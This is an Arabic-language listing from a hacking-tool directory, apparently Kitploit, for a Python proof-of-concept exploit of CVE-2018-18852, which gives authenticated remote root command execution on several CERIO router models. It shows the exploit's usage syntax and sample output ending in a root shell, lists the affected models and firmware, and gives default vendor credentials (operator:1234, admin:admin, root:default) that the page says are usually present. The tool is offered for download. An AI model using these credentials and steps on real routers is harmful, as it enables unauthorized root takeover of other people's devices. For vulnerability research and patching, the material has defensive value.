Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-18852 — CERIO RCE CVE-2018-18852، تنفيذ أوامر عن بُعد معتمد (بالإعدادات الافتراضية للبائع) عبر الويب كمستخدم جذر. | Kitploit
أدوات/GitHubGitHub/hook-s3c/cve-2018-18852
أمان الأنظمة المدمجةأمان إنترنت الأشياءهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubhook-s3c/cve-2018-18852

CVE-2018-18852

CERIO RCE CVE-2018-18852، تنفيذ أوامر عن بُعد معتمد (بالإعدادات الافتراضية للبائع) عبر الويب كمستخدم جذر.

عرض المستودع
4516منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CERIO router Authenticated RCE (backdoor vendor creds) CVE-2018-18852 Python PoC

hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

Python PoC عاملة لـ CVE-2018-18852، ظهرت أصلاً على؛ https://github.com/hook-s3c/CVE-2018-18852

ما الموضوع

أجهزة راوتر CERIO موديلات ومتغيرات DT300N، DT100G، AMR-3204، WMR-200N معرضة لثغرة RCE مصادق عليها قائمة على الويب كمستخدم root.

موجودة كـ 0day بدون إفصاح استشاري؛ https://www.fortiguard.com/zeroday/FG-VD-18-149

عادةً ما تكون بيانات اعتماد البائع الافتراضية موجودة، لذا التنفيذ تافه.

المعمارية هي MIPS.

الاستخدام ومثال

root@kitploit:~
Usage: exploit.py <ipaddress> <port> <creds>
root@kitploit:~

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852، تم تأكيده على؛
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] تحيات لـ vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob,
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] اذهب واشترِ Introducing Neals لـ YTCracker، التجاوز الحكومي ليس مزحة - استيقظوا يا أغبياء
[*] ================================================

root@cerio:~# id
[!] قد لا يكون هذا هو الموديل الصحيح (DT-300N-NGS-M)، جرب مرة أخرى
[+] تم الحصول على رمز pid بنجاح: 1312


uid=0(root) gid=0(root)

root@cerio:~# 

توليفات الاعتماد الافتراضية؛

  • operator:1234
  • admin:admin
  • root:default

تحيات

تحية لـ vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee اذهب واشترِ Introducing Neals لـ YTCracker، التجاوز الحكومي ليس مزحة - استيقظوا يا أغبياء

HTP!!!! YEET

تنزيل الأداة